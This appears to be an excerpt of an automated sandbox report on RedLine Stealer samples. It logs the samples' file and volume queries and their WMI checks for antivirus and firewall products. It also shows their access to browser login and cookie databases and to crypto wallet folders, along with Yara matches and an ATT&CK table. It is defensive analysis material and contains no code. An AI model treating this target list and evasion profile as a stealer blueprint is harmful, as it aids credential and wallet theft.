                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Users\user\Desktop\RgIbrhxoEx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Users\user\AppData\Roaming\LjGABleGAy.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Users\user\AppData\Roaming\LjGABleGAy.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2243746245.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2351734880.0000000006D87000.00000004.00000020.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2326375186.0000000000DAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 3620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 7448, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 3620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 7448, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 3620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 7448, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
